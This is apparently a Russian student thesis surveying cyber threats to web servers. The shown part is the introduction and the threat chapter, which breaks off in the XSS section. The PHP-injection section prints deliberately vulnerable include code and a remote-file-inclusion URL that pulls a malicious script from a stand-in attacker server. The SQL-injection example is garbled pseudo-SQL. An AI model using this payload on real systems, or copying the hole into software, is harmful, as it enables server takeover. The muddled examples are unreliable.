Размещено на http://www.allbest.ru/

2

Содержание

Введение

1. Анализ актуальных киберугроз

1.1 Виды угроз, представляющих опасность для вычислительной системы

1.2 Угрозы воздействия на телекоммуникационную структуру и специальное программное обеспечение

1.2.1 Перехват сетевых данных

1.2.2 Атаки методом подмены IP-адреса или IP-спуфинг

1.2.3 Парольные атаки

1.2.4 Атака методом вызова отказа в обслуживании, или DoS/DDoS атака

1.3 Угрозы воздействия на структуру веб-сайта, находящегося на вычислительной системе, использующейся как веб-сервер

1.3.1 SQL - инъекции

1.3.2 PHP - инъекции

1.3.3 Межсайтовый скриптинг или XSS атаки

1.4 Выводы по первой главе

2. Анализ методов противодействия киберугрозам

2.1 Методы противодействия угрозам воздействия на телекоммуникационную структуру

2.1.1 Обнаружение факта анализа трафика

2.1.2 Политика межсетевого экранирования

2.1.3 Защита от спуфинга

2.1.4 Методика защиты от DoS и DDoS атак

2.2 Защиты от угроз воздействия на структуру веб-сайта, находящегося на веб-сервере, реализованном на базе вычислительной системы

2.2.1 Методика защиты от SQL - инъекций

2.2.2 Методика защиты от PHP - инъекций

2.3 Выводы по второй главе

3. Методы противодействия межсайтовому выполнению сценариев

3.1 Классификация XSS атак

3.2 Алгоритм проведения XSS атак

3.3 XSS атаки на HTML5

3.4 Методы защиты от XSS атак

3.5 Примеры реальных XSS атак

3.6 Выводы по третьей главе

Заключение

Список использованной литературы



Введение

Отметим, что сегодня, в эпоху глобализации, наибольшую значимость для современного общества представляет именно стремительное развитие информационных технологий, которые, по сравнению с прошлым веком ушли задолго вперед.

Безусловно, не последнюю роль в развитии общества играет Интернет, который представляет собой всемирную систему объединённых компьютерных сетей, предназначенных для хранения, передачи и обработки информации.

Однако, параллельно с развитием возможностей Интернета и, в первую очередь, его использования в банковском секторе, увеличилась вероятность возникновения внешних угроз в виде хакерских атак в киберпространстве, которые, также, как и вся сетевая инфраструктура, не стоят на месте и постоянно совершенствуются.

Надо сказать, что с каждым годом возможности и потенциал современных вирусов, шпионского оборудования и хакеров, в частности, также растут, что приводит к снижению безопасности пользования Интернетом и, в первую очередь, это касается персональных данных пользователей.

Следовательно, для минимизации потенциальных угроз и повышения возможности им противодействовать необходимо досконально изучать алгоритмы их возникновения и действия и, таким образом, вырабатывать новые более совершенные методы защиты, что, по нашему мнению, сегодня до конца не изучено и, соответственно, определяет актуальность данного исследования.

Объектом исследования являются киберугрозы в пространстве сети Интернет.

Предметом исследования являются методы защиты от киберугроз в сети Интернет.

Цель исследования - изучить всевозможные виды угроз, которые являются потенциально опасными для сети Интернет и разработать методы защиты от них.

Для того чтобы выполнить поставленную цель, необходимо решить следующие задачи:

- проанализировать современную литературу на предмет всех существующих видов и типов киберугроз в сети Интернет, а также дать их краткую характеристику;

- определить перечень основных потенциальных угроз, которые могут нарушать структуру веб-сайтов и веб-серверов;

- выработать основные методы предупреждения киберугроз и разработать перечень соответствующих рекомендаций.

Теоретической и методологической базой настоящей дипломной работы стали работы отечественных и зарубежных авторов таких как Г. М. Афониной, П. В. Безногова, В. В. Гераскина, В. Олифера и Э. Танненбаума, а также дополнительные электронные ресурсы.

В настоящем исследовании использовались такие методы как: метод анализа и синтеза, индуктивный и дедуктивный методы, а также логический и теоретический метод научного познания.

Теоретическая значимость исследования заключается в использовании комплексного подхода к изучению и анализу существующих в сети Интернет киберугроз.

Практическая значимость исследования заключается в возможности использования выводов и рекомендаций, приведенных в данном исследовании на практике.

Структура работы состоит из введения, трех глав, состоящих из подразделов, заключения, списка использованной литературы.

1. Анализ актуальных киберугроз

1.1 Виды угроз, представляющих опасность для вычислительной системы

Сегодня число атак, нацеленных на вычислительные системы, значительно возросло. Вычислительные системы, особенно использующиеся как веб-серверы, являются особенно уязвимыми из-за своей открытости, так как они служат для обмена информацией с пользователями.

В связи с этим, отметим, что уровень обеспокоенности владельцев крупных предприятий от возможности возникновения потенциальных угроз неуклонно растет, что наглядно представлено на Рисунке 1 [19].

Рисунок 1 - Статистические данные обеспокоенности киберугрозами владельцев крупных предприятий

С целью классификации угроз необходимо рассмотреть вычислительную систему, как многоуровневый программно - аппаратный комплекс, состоящий из множества взаимодействующих механизмов. Помимо этого, следует помнить, что безопасность:

- Достигается постоянным совершенствованием методов ее обеспечения и должна подвергаться постоянному анализу;

- Оценивается по самому слабому звену;

- Должна иметь непрерывный процесс выполнения.

Условно все угрозы, которые могут принести вред вычислительной системе можно разделить на:

- Угрозы физического воздействия на вычислительную систему, либо на её составные части (например, возникновение пожара, либо хищение аппаратных составляющих, также такие угрозы могут возникнуть в результате некомпетентного технического обслуживания, например, неправильное физическое подключение компонентов);

- Угрозы воздействия на телекоммуникационную структуру, обслуживающую вычислительную систему (например, получение злоумышленником неправомерного доступа в локальную сеть, в которой находится вычислительная система);

- Угрозы воздействия на специальное программное обеспечение или операционную систему вычислительной системы, на которой реализован веб-сервер (например, злоумышленник получил доступ к учетной записи администратора операционной системы, на которой установлено программное обеспечение веб-сервера.

- Как следствие, злоумышленник может выполнить подмену контента, а также остановку сервера по своему усмотрению);

- Угрозы воздействия на структуру веб-сайта, находящегося на веб сервере;

В графическом виде типы угроз, потенциально приносящие вред вычислительной технике представлены на Рисунке 2.

Рисунок 2 - Угрозы, которые могут принести вред вычислительной системе

Рассмотрим угрозы, которые могут влиять на телекоммуникационную структуру и специальное программное обеспечение.

1.2 Угрозы воздействия на телекоммуникационную структуру и специальное программное обеспечение

Стоит определить, что телекоммуникационная инфраструктура - это совокупность телекоммуникационных устройств, в которую входит сетевой интерфейс аппаратной компоненты вычислительной системы. Отметим, что данный вид угроз является многообразным и глобальным, ведь телекоммуникационная структура имеет выход в сеть «Интернет», а значит, любой пользователь Сети может при наличии у него определенного инструментария и знаний осуществить попытку нарушения штатного режима работы либо попытку обхода аутентификации или другой системы защиты. Вместе с тем, сегодня существует большое разнообразие атак на телекоммуникационную структуру, так же, как и множество различных систем, против которых они направлены [16].

При этом, отличия одних атак заключаются в сложности, других - в простоте, так как воспроизвести может их любой пользователь, не подразумевающий о последствиях. Для того, чтобы оценить такие атаки нужно знать о некоторых ограничениях, изначально присущих стеку протоколов TPC/IP. Напомним, что формирование Интернета происходило для выстраивания связи государственных учреждений с университетами для научных исследований и учебного процесса. У создателей сети Интернет даже в мыслях не было, что их сеть получит такую популярность [9].

В результате, требования безопасности отсутствовали в спецификациях ранних версий интернет - протокола (IP). По этой причине большое количество реализаций IP - изначально уязвимые. Спустя несколько лет, после получения множества рекламаций (RFC - Request for Comments) произошло внедрение ряда средств безопасности для IP. Если учитывать тот факт, что изначально не происходила разработка средств, позволяющих защищать протокол IP, а все их реализации дополнялись различными сетевыми услугами, продуктами, процедурами, которые снижали риски. Телекоммуникационная среда рассматривается, как сетевая среда, необходимая для осуществления передачи данных. Необходимо рассмотреть телекоммуникационную инфраструктуру с точки зрения протокола IP.

Для большего понимания необходимо указать, каким образом размещается вычислительная система в телекоммуникационной инфраструктуре предприятия. Она размещается за демилитаризованной зоной в приватной зоне. Если это веб-сервер, то он обычно размещается в демилитаризованной зоне. Это сегмент сети, в котором присутствуют общедоступные сервисы, который и отделяет эти сети от частных. То есть локальная сеть находится под дополнительной защитой, а демилитаризованная зона находится в таком сегменте сети, в который могут получить доступ любые пользователи сети Интернет [2].

Цель демилитаризованной зоны -- добавить дополнительный уровень безопасности в сетевую инфраструктуру предприятия, позволяющий минимизировать ущерб в случае атаки. У внешнего злоумышленника есть прямой доступ исключительно к оборудованию, которое находится в демилитаризованной зоне [15].

На рисунке 3 представлена схема организации сети с одним межсетевым экраном из которого следует, что для того, чтобы создать сеть с демилитаризованной зоной можно использовать один межсетевой экран с тремя сетевыми интерфейсами:

1. Суть первого заключается в установке соединения с сетью провайдера услуги;

2. Второй заключается в установке соединения с внутренней сетью;

3. Третий необходим для установки соединения с демилитаризованным сегментом.

Эту схему можно создать без особых трудностей, но для этого необходимо хорошее оборудование и администрировании: в обязанности межсетевого экрана входит обработка всего трафика, который идет в демилитаризованную зону и во внутреннюю сеть [14].

При этом он становится единой точкой отказа во время взлома или же при ошибке в эксплуатации. На рисунке 3 графически представлена схема организации сети с одним межсетевым экранамом.

Рисунок 3 - Организация сети с одним межсетевым экраном

Наиболее безопасный подход - это когда для того, чтобы создать демилитаризованную зону необходимо 2 межсетевых экрана: один необходим для осуществления контроля соединения в демилитаризованную зону из внешней сети, а второй -- для осуществления контроля за соединением из демилитаризованной зоны во внутреннюю сеть. В данном случае для того, чтобы атака на внутренние ресурсы имела успех, необходимо скомпрометировать 2 устройства.

Также, на межсетевом экране 1 есть возможность настроить более слабые правила защиты, обеспечив при этом усиленную защиту локальной сети, настроив межсетевой экран 2 [12].

Ещё более высокий уровень защиты обеспечивается при использовании двух межсетевых экрана от 2-х разных производителей, желательно с различной архитектурой, так как в следствии этого довольно-таки сильно снижается вероятность того, что и у первого, и у второго устройства будет одинаковая уязвимость. К примеру, при возникновении непредвиденной ошибки в настройках с минимальной вероятностью появится в конфигурации интерфейсов 2-х разных производителей; пробел такого рода в безопасности, который обнаружился в системе у 1-го производителя, со значительно меньшей вероятностью будет и в системе второго производителя. Недостаток этой архитектуры - цена, которая является более высокой. Однако зачастую для того, чтобы вычислительная система оставалась в безопасности при использовании сети или чтобы в безопасности была система, которая используется в качестве веб-сервера в части, которая касается телекоммуникационной структуры, требуется выстроить многоуровневую, сложную систему безопасности, не учитывая ее стоимость [18].

В итоге можно сказать, что оборудование, которое находится в пределах демилитаризованной зоны, представляет собой потенциально слабое место с точки зрения безопасности аппаратно-программного комплекса, использующегося как веб-сервер.

Стоит отметить, что веб-сервер и телекоммуникационное оборудование, которое обеспечивает его работу, так или иначе будут размещены в пределах области, доступной из внешней среды, так как веб-сервер необходим для обслуживания запросов удаленных клиентов [11].

Иными словами, объектом атаки может стать пограничный маршрутизатор и межсетевой экран, в результате выхода из строя которых веб-сервер не сможет производить обработку запросов внешних пользователей, так как не будет подключен к каналу связи.

Помимо этого, необходимо помнить, что даже если локальная сеть защищена двумя межсетевыми экранами, вычислительные системы также подвержены опасностям, но в меньшей степени.

На рисунке 4 графически представлена схема организации сети с двумя межсетевыми экранами.

Рисунок 4 - Организация сети с двумя межсетевыми экранами

Далее мы рассмотрим возможности перехвата данных в сети Интернет.

1.2.1 Перехват сетевых данных

Начало атаки на вычислительную систему практически всегда начинают с анализа трафика, поступающего и исходящего от него.

Анализаторы трафика представляют собой прикладное программное обеспечение, использующее сетевую карту, которая работает в режиме «promiscuous mode».

В данном режиме сетевой адаптер отправляет для обработки все пакеты, которые были получены через физические каналы.

Анализатор при этом осуществляет перехват сетевых пакетов, передающихся по определенному домену.

На сегодняшний день анализаторы трафика выполняют свою деятельность в сетях на законном основании.

Их используют для обнаружения неисправностей. Но из-за того, что часть сетевых приложений осуществляют передачу данных в текстовом формате (к примеру, взаимодействующие по протоколам telnet, POP3, FTP, SMTP), используя анализатор появляется возможность узнать полезную, а в некоторых случаях и конфиденциальную информацию (к примеру: пароли и имена пользователей).

Однако перехват паролей и имен является опасным по той причине, что большое количество пользователей используют для различных систем и приложений одинаковый пароль.

А у некоторых вообще один пароль является доступом ко всем приложениям и ресурсам. При функционировании приложения в режиме «клиент/сервер» и передаче данных аутентификации по сети в читаемом текстовом формате, эта информация, скорее всего, является доступом к иным внешним и корпоративным ресурсам.

На 3 этапа можно разделить стандартные сетевые атаки: сбор информации, выявление уязвимых мест у атакуемой системы, реализация выбранной атаки. Первый этап атаки заключается в изучении сетевой топологии атакуемой сети, а также в выявлении доступных сетевых и других сервисов, которые функционируют на атакуемом узле.

На рисунке 5 графически представлены способы выявления сетевой топологии.

Рисунок 5 - Способы выявления сетевой топологии

Этап по выявлению уязвимых мест у атакуемой системы происходит параллельно или после этапа по сбору информации. В изучения сетевой топологии входит выявление сетевых узлов, которые есть в заданном диапазоне адресов.

При этом популярные сетевые сканеры, например, «netcat», «zenmap», «InterNetView», решают эту задачу в основном через ICMP-сканирование.

Отметим, что протокол ICMP применяется в определении доступности сетевых узлов, а утилита ping - стандартная программа, которая использует протокол ICMP.

Именно эта утилита и отправляет запрос ICMP (тип пакета ECHO_REQUEST) на тестируемый узел запроса, а после получает ICMP ответ (тип пакета ECHO_REPLY).

Второй по популярности способ выявления сетевой топологии - TCP-сканирование. Его сущность заключается в следующем: установить сетевое соединение по определенному порту, перебирая IP-адреса.

Если произошла установка TCP-соединения, то первым пакет, отправляемый на тестируемый узел - это пакет с установленным флагом SYN [8].

По сути, существуют 3 ситуации, которые различаются тем, присутствует ли в сети система с адресом, где включена тестируемая служба. Если есть узел, на котором функционирует запрашиваемый порт, то ответом будет пакет с установленными флагами ACK и SYN, которые будут свидетельствовать о доступности соединения с этим портом.

Производя анализ этого ответа, атакующий может установить факт присутствия узла в сети, определить на нем наличие определенной сетевой службы. Если система присутствует, но при закрытом запрашиваемым портом, то ответом будет TCP-пакет с установленными флагами ACK и RST, которые будут свидетельствовать о невозможности установить соединение с запрашиваемым портом. Получив этот ответ, атакующий устанавливает присутствие в сети узла с интересующим IP-адресом, но с недоступным запрашиваемым портом.

Вместе с тем, в ответ ничего не придет в том случае, если в сети отсутствует искомый узел.

Подобная технология применяется, когда уже заранее есть информация о том, что узел в сети существует, однако требуется дополнительная информация о доступных сетевых службах, т. е. требуется выполнить сканирование портов у сетевого узла [9].

В данном случае происходят последовательные попытки подключиться в определенном диапазоне к сетевым портам. В редких случаях применяются подряд все номера портов, в основном используются только наиболее интересные для злоумышленников с целью последующего проникновения.

Иногда, формирование номеров злоумышленниками происходит на основе информации, полученной по коду ICMP-ответа ранее, о том, какого типа операционная система. Признаками сетевой атаки являются последовательные попытки установить соединение с несколькими портами.

Стоит отметить, что был рассмотрен только классический способ TCP-сканирования, который называется сканирование методом Connect, когда происходит установка полного TCP-соединения.

На рисунке 6 можно увидеть пользовательский графический интерфейс программы «Zenmap», в котором отображается результат выполнения сканирования TCP- и UDP- портов известного IP - адреса в диапазоне от 130 до 140 методом Connect. На рисунке 6 представлен графический интерфейс программы «Zenmap».

Рисунок 6 - Пользовательский графический интерфейс программы «Zenmap» с отображением результатов сканирования

Одновременно с этим, также существуют и иные методы, которые позволяют осуществлять скрытно процесс сканирования, это: FIN-сканирование, SYN-сканирование, XMAS-сканирование, ACK-сканирование, NULL-сканирование.

Также существуют и утилиты, с помощью которых можно оптимизировать вышеуказанные методы.

Необходимо дать краткое описание данных методов. Метод сканирования TCP-портов системным вызовом Connect - основной для сканирования портов, используя протокол TCP.

Благодаря этой функции атакующий узел может осуществить соединение с каким-либо портом веб-сервера. Если порт, который указан как параметр функции, прослушивается сервером, то есть и открытый порт для соединения. В результате произойдет по указанному порту соединение с сервером [16].

Более того, если соединение установить не удалось, то порт с указанным номером - закрытый.

Метод Connect - легко обнаруживаемый из-за множества попыток произвести подключение с одного адреса, а также из-за ошибок, возникших при установке соединения.

Метод сканирования TCP-портов флагом SYN популярен как «сканирование с установлением наполовину открытого соединения», т.к. отсутствует установка полного TCP-соединения. Вместо этого SYN-пакет отправляется на определенный порт сервера атакующим, планируя установить соединение, и ожидает ответ. Если в ответе присутствуют флаги SYN|ACK, то это значит, что порт открыт, и он прослушивается сервером. Если в ответ получен TCP-пакета с флагом RST, то это значит, что порт является закрытым и прослушивание отсутствует.

При приеме SYN|ACK-пакета узел незамедлительно осуществляет отправку RST-пакета для проведения сброса соединения, устанавливаемого сервером.

Еще одно название метода сканирования TCP-портов флагом FIN звучит следующим образом: «обратное стелс-сканирование с использованием флага FIN».

Идея данного метода заключается в следующем: согласно RFC 793 сервер должен ответить RST-пакетом на закрытый порт на прибывший FIN-пакет [6].

Игнорирование FIN-пакетов на открытые порты происходит объектом сканирования. Метод сканирования TCP-портов флагом ACK схож с FIN-сканированием.

Его также называют «обратное стелс-сканирование с использованием флага ACK».

Сущность этого метода: согласно RFC 793 на прибывший на закрытый порт ACK-пакет, ответ сервера должен быть в виде RST-пакета.

Происходит игнорирование ACK-пакетов на открытые порты объектом сканирования. Методы сканирования NULL и XMAS заключаются в процессе отправки TCP-пакета на сервер с установленными всеми флагами (XMAS) или же со всеми сброшенными флагами (NULL).

В соответствии с RFC 793 на прибывший пакет с данными значениями флагов на закрытый порт сервер дать ответ в виде RST-пакета. Происходит игнорирование таких пакетов на открытые порты объектом сканирования. Благодаря методам сканирования, указанным выше, злоумышленник узнает о наличии на атакуемом узле открытых TCP-портов.

Для того, чтобы обнаружить открытые UDP-порты используется совершенно другой подход. Проанализировать открытые UDP-порты злоумышленнику сложнее, чем TCP-порты, так как протокол UDP, в отличие от протокола TCP - это протокол с негарантированной доставкой данных.

В связи с чем UDP-порт не осуществляет передачу подтверждения приема запроса на установление соединения, и не несет никаких гарантий, что данные, отправленные UDP-порту, успешно дойдут до него [3].

Но большая часть серверов в ответ на пакет, который прибыл на закрытый UDP-порт, отправляют ICMP-сообщение «Порт недоступен» (Port Unreachable -- PU). Получается, что если пришло ICMP-сообщение PU в ответ на UDP-пакет, то сканируемый порт - закрытый, а если отсутствует PU, то порт является открытым.

Подводя итог рассмотренным методам анализа трафика, стоит отметить, что злоумышленник может, определив топологию сети и открытые порты на телекоммуникационном оборудовании или аппаратной части веб-сервера, осуществить перехват данных, содержащих в себе аутентифицирующую информацию, а также получить доступ к телекоммуникационным устройствам, которые непосредственно задействованы в обслуживании веб-сервера.

Все эти угрозы могут привести к успешной реализации любой атаки, но анализ трафика сам по себе атакой не является и деструктивного воздействия на веб-сервер и телекоммуникационное оборудование не оказывает. Но методы анализа трафика являются подготовительным этапом для реализации атаки. киберугроза сайт сервер интернет

Далее, мы рассмотрим атаки методом подмены IP-адреса более известные как IP-спуфинг.

1.2.2 Атака методом подмены IP-адреса или IP-спуфинг

Необходимо отметить, что IP-спуфинг, как метод хакерской атаки, имеет место тогда, когда злоумышленники, которые находятся внутри корпоративных сетей или вне их, выдают себя за санкционированных пользователей.

По сути, этого можно добиться двумя различными способами.

Во-первых, злоумышленники могут использовать:

- IP-адреса, которые находятся в пределах диапазона санкционированных IP-адресов;

- авторизованные внешние адреса, посредством использования которых доступ к определенным сетевым ресурсам является разрешенным. К примеру, речь идет о получении входа в привилегированный режим пограничного маршрутизатора либо межсетевого экрана.

Отметим, что атаки методом IP-спуфинга являются подготовительными мероприятиями для других атак. Связано это с тем, что посредством использования IP-спуфинга можно создать фундамент для дальнейшей вставки ложной информации или вредоносных команд в потоки имеющихся данных, которые передаются между клиентскими и серверными приложениями или по различным каналам связи между устройствами одного ранга [14].

Если злоумышленнику удается изменить алгоритм маршрутизации и направить трафик на ложный IP-адрес, он получит все пакеты и сможет отвечать на них так, будто он является санкционированным пользователем.

Успешная реализация атаки методом IP-спуфинга может повлиять на работу веб-сервера, так как злоумышленник, захвативший управление телекоммуникационной средой, может осуществить подмену веб-сервера на нелегитимный, а также вызвать отказ в обслуживании веб-сервером пользовательских запросов.

Рассмотрим существующие виды парольных атак.

1.2.3 Парольные атаки

Отметим, что, как правило, любой правонарушитель или, по сути, хакер, может проводить парольные атаки посредством использования целого перечня различных методов среди которых стоит упомянуть «фишинг», «троянская лошадь», а также метод обычного перебора под названием «brute force attack» [17].

Фактически, все существующие сегодня виды «парольных» атак могут быть представлены следующим образом. На рисунке 7 представлены виды парольных атак.

Рисунок 7 - Виды парольных атак

Отметим, что в принципе все логины и пароли довольно просто заполучить посредством использования такого метода как IP-спуфинг или сниффинг пакетов, однако большинство хакеров стараются подбирать пароли и логины с помощью возможности многочисленных попыток получения доступа в систему.

Данный метод давно уже зарекомендовал себя и называется «brute force attack», что в дословном переводе означает «осуществление взлома посредством грубой силы».

Как правило, при использовании данного метода хакеры прибегают к специальным программам, которые позволяют получать доступ к ресурсам общего пользования, к которым, в том числе, относятся и узлы, использующиеся в качестве серверов. В результате использования таких программ и приложений возможно на правах обычного пользователя, пароль которого был подобран получить доступ в системы, что определенно означает получение значительных привилегий доступа и возможность обеспечения такого доступа в будущем.

При этом, изменение логина и пароля самого пользователя, в таких ситуациях уже не сможет оградить от потенциального взлома системы.

Помимо прочего, бывают и такие ситуации, когда несколько пользователей используют одинаковые пароли, не обращая внимание на его криптографическую стойкость для доступа к большинству ресурсов.

Фактически, устойчивость самого слабого хоста соответствует устойчивости паролей и, это значит, что хакер, который смог выявить такой пароль сможет получить доступ в любую систему, которая, в свою очередь, защищена равнозначным паролем. Однако, если пользователь не будет использовать пароли, представленные в текстовых формах, то подобных атак можно избежать.

Более того, свести на нет угрозу таких атак возможно посредством использования одноразовых паролей или метода криптографической аутентификации, поскольку отнюдь не все приложения, хосты и устройства поддерживают вышеуказанные методы аутентификации.

Надо отметить, что пароли могут содержать цифры, символы верхнего регистра, а также различные специальные символы, как, например, «#, %, $», а минимальная длина пароля не может составлять и быть меньше восьми символов.

Безусловно, самые надежные пароли обладают большей длиной и большим сочетанием различных символов и поэтому пользователям рекомендуется записывать такие пароли [11].

Вместе с тем, посредством целого перечня прикладных программ, которые позволяют шифровать списки паролей, их можно хранить на любом устройстве, имеющем такую возможность.

В данном случае пользователи должны просто записать самый сложный пароль, который и будет обеспечивать защиту всех остальных паролей и данных, охраняемых обозначенным нами приложением.

Что касается администраторов, то они имеют возможность бороться с использованием хакерами метода подбора паролей и одним из таких методов является средство «L0phtCrack», применяемое хакерами для подбора паролей в операционной системе Windows NT.

Для того, чтобы наглядно представить время, необходимое для полного перебора паролей в зависимости от их длины мы использовали простую таблицу. Отметим,что пароли могут содержать до 36 различных символов, включая комбинацию латинских букв одного регистра и цифр, а скорость перебора таких паролей может составлять до 100 000 паролей каждую секунду.

В Таблице 1 представлена оптимальная продолжительность подбора паролей в зависимости от их длины.

Таблица 1- Продолжительность подбора паролей

Количество символов	Время
5	10 мин
6	6 часов
7	9 дней
8	10 месяцев
9	32 года
10	1161 год
11	41082 года
12	1.5 млн лет

В результате, если использовать пароль из восьми символов, который будет состоять из 2-х алфавитов (RU, ENG) разного регистра, цифр и специальных символов, то шансы подбора пароля будут нулевые. Теперь рассмотрим вид атаки, под названием «фишинг».

Фишинг - вид интернет мошенничества с использованием социальной инженерии для получения доступа к конфиденциальной информации пользователей - логинам и паролям [15].

Основной задачей мошенника, в данном случае, является получение логина и пароля от определенного сайта, с последующим их использованием, т.е это может быть логин и пароль банковского кабинета или номер и пинкод карточки для вывода денег на свой счет. Так же довольно часто используют фишинг для доступа к вашим аккаунтам в социальных сетях и т.д. В любом случае если пароль и логин стал известен мошенникам последствия для будут весьма неприятные.

Одним из видов фишинга может быть массовая рассылка от имени какого-либо банка или сервиса, с просьбой отправить в ответ данные, т.к. это необходимо, например, для проверки безопасности или еще чего-либо (в основном такие запросы очень правдоподобны и доверчивые пользователи отправляют свои данные не задумываясь).

Другой вид фишинга это подделка сайта оригинала - обычно мошенниками подделывается единственная страница - страница ввода логина и пароля. Кстати, в данном случае определить то, что имела место фишинг-атака можно по тому, что после ввода логина и пароля выдается сообщение о том, что ввод логина и пароля не верен.

При подделке сайта для привлечения на них жертв так же используется массовая рассылка писем с просьбой перейти на сайт. Первое что надо помнить всегда: пароль является личными данными пользователя и ни одна организация не имеет прав требовать от пароля. Он нужен только для получения доступа к определенному сервису и знать его может только сам пользователь.

Всегда нужно проверять через адресную строку на том ли сайте вы вводите свой пароль. (обычно подделывается и домен. т.е. он очень похож на свой оригинал, различие может быть всего лишь в одной букве, например, microsoft.com может превратиться в maicrosoft.com)

Далее, на Рисунке 8 наглядно представлен пример фишингового сайта.

Рисунок 8 - Пример фишингового сайта

В данном доменном адресе буква «t» заменена на букву «l». Данный сайт создан, с целью получения логина и пароля пользователей социальной сети Вконтакте.

1.2.4 Атака методом вызова отказа в обслуживании, или DoS/DDoS атака

Данный тип атаки является наиболее известной формой воздействия на телекоммуникационную структуру, обслуживающую веб-сервер. Именно простота реализации и огромный причиняемый вред привлекают к DoS пристальное внимание администраторов, отвечающих за сетевую безопасность. Сегодня существует множество атак подобного типа.

Атаки DoS отличаются от атак других типов. Они не нацелены на получение доступа к сети или на получение из этой сети какой-либо информации. Атака DoS делает сеть недоступной для обычного использования за счет превышения допустимых пределов функционирования сети, операционной системы или приложения.

В случае использования веб-сервера атаки DoS могут заключаться в том, чтобы занять все ресурсы, доступные для сервера, и держать их в занятом состоянии, не допуская обслуживания обычных пользователей.

В ходе атак DoS могут использоваться протоколы TCP и ICMP (Internet Control Message Protocol).

Вместе с тем, большинство атак DoS опирается не на программные ошибки или слабые места в системе безопасности, а на общие слабости системной архитектуры [5].

Некоторые атаки сводят к нулю производительность сети, переполняя ее нежелательными и ненужными пакетами или сообщая ложную информацию о текущем состоянии сетевых ресурсов.

Когда атака такого типа проводится одновременно через множество устройств, то можно говорить о распределенной атаке DoS (DDoS - distributed DoS). Ниже приведена схема распределенной атаки на веб-сервер. На рисунке 9 представлено схематическое отображение распределенной атаки на веб-сервер.

Рисунок 9 - Схематическое отображение распределенной атаки на веб-сервер

Далее рассмотрим перечень угроз, которые потенциально могут влиять на структуру сайтов, которые физически расположены на веб-серверах.

1.3 Угрозы воздействия на структуру веб-сайта, находящегося на вычислительной системе, использующейся как веб - сервер

1.3.1 SQL - инъекции

SQL (structured query language -- «язык структурированных запросов») -- формальный непроцедурный язык программирования, применяемый для создания, модификации и управления данными в произвольной реляционной базе данных, управляемой соответствующей системой управления базами данных (СУБД). Программная компонента веб-сервера - это графический пользовательский интерфейс и реляционная база данных.

Сайт, или веб-ресурс, программная компонента веб-сервера, это программа, в большинстве случаев написанная с условием использования баз данных, где хранится вся информация о зарегистрированных пользователях и об их паролях. При помощи SQL-запроса можно внедрить произвольный SQL-код, который сервер обработает и выдаст ответ.

Принцип работы такого механизма следующий: SQL-сервер выдаст ответ на ваш вопрос, а делать вы с ним можете все что угодно. Можете как-то модифицировать эту информацию, посчитать или банально вывести на экран браузера.

Теперь вернемся к SQL Injection, как мы уже знаем, это внедрение произвольного кода в SQL-запрос. То есть уязвимость существует тогда, когда злоумышленник может внедрить свой выполняемый код.

Пользователь обращается на веб-сервер компании А для того, чтобы получить графическую информацию.

В схематичном упрощенном виде данный запрос может быть представлен таким образом: "Я хочу получить доступ к графической информации", но в данный процесс вмешивается злоумышленник, который произвел SQL-атаку и теперь запрос преобразовался в: "Мне хотелось бы обеспечить себя доступом к графической составляющей $ИЛИ к учетным данным каждого пользователя, который зарегистрирован на данном конкретном веб-сервере”

С точки зрения языка SQL это запрос можно интерпретировать как:

SELECT информация FROM компания-А WHERE (тип=”графическая”) OR (тип=”логины” AND тип=”пароли”) LIMIT 1.

Отметим, что в процессе обработки подобного запроса любой веб-сервер в ответном сообщении приведет ссылку на базу данных, содержащую все релевантные учетные данные [3].

Графически схема атак, которые производятся посредством метода SQL-инъекции представлена на Рисунке 10.

Рисунок 10 - Алгоритм атак с использованием SQL - инъекций

Далее, считаем целесообразным рассмотреть PHP-инъекции.

1.3.2 PHP - инъекции

Фактически, под PHP-инъекциями понимается такая атака на сайт, когда злоумышленник старается внедрить свой php-код в атакуемое php-приложение.

Потенциально опасными функциями являются:

eval(),

preg_replace() (с модификатором «e»),

require_once(),

include_once(),

include(),

require(),

create_function().

При успешной инъекции атакующий может выполнить произвольный (потенциально опасный) php-код на целевом сервере. На пример залить шелл. Но сначала подробно рассмотрим, как это происходит.

Например, представим, что у нас имеется сайт, написанный на PHP. Представим так же, что сайт использует комманду page=page.html для отображения запрашиваемой страницы.

Код будет выглядеть так:

<?php

$file =$_GET['page']; //Отображаемая страница

include($file);

?>

Это значит, что все, выводимое на странице, будет внедрено в php-код этой страницы. Следовательно, атакующий может проделать что-то наподобии:

http://www.атакуемый_сайт.com/index.php?page=http://www.атакующий_серв.com/вредоносный_скрипт.txt?

Если посмотреть, что происходит после выполнения инклуда, нам представится следующий код, выполненный на целевом сервере:

<?php

$file ="http://www.атакующий_серв.com/вредоносный_скрипт.txt?"; //$_GET['page'];

include($file); //$file - это внедренный злоумышленником скрипт

?>

Мы видим, что злоумышленник произвел успешную атаку на целевой сервер.

Итак, почему же злоумышленник смог провести PHP-инъекцию? Все потому, что функция include() позволяет запускать удаленные файлы. Почему в примере был указан скрипт с расширением *.txt, а не *.php?

Ответ прост, если бы скрипт имел формат *.php, он бы запустился на сервере злоумышленника, а не на целевой системе.

Так же был добавлен символ "?" в пути к внедряемому скрипту, чтобы убрать что-либо, находящееся внутри функции include() на целевом сервере.

Пример:

<?php

$file =$_GET['page'];

include($file .".php");

?>

Этот скрипт добавляет расширение *.php к чему либо, вызываемому командой include().

То есть http://www.атакующий_серв.com/вредоносный_скрипт.txt

Превращается в

http://www.атакующий_серв.com/вредоносный_скрипт.txt.php

С таким именем скрипт не запустится (на сервере злоумышленника не существует файла /вредоносный_скрипт.txt.php)

Поэтому, и добавляется "?" в конец пути к вредоносному скрипту:

http://www.атакующий_серв.com/вредоносный_скрипт.txt?.php

Но он остается исполняемым.

1.3.3 Межсайтовый скриптинг или XSS атаки

Стоит отметить, что под данным видом атак, которые, по сути, направлены на веб-серверы и веб-сайты, которые, в свою очередь, отображают все введенные пользователями данные, следует понимать атаки, в результате которых хакеры делают акцент на взлом кода самого веб-сайта, внедряя вредоносные сегменты.

Безусловно, на многих серверах хранятся не только личные данные пользователей, но и их логины и пароли, что само собой является целью большинства злоумышленников, которые могут путем создания подложной учетной записи, размещать в поле сайта вредоносный код [3].

Отметит, что атаки данного типа возможны только посредством использования различных вредоносных сегментов кода, написанных на языке Javascript. При этом, сами сегменты подгружаются с другого веб-сайта. Таким образом, пользователи вместо того, чтобы активировать вполне безобидную процедуру, на самом деле активируют внедренный на сайт вредоносный код.

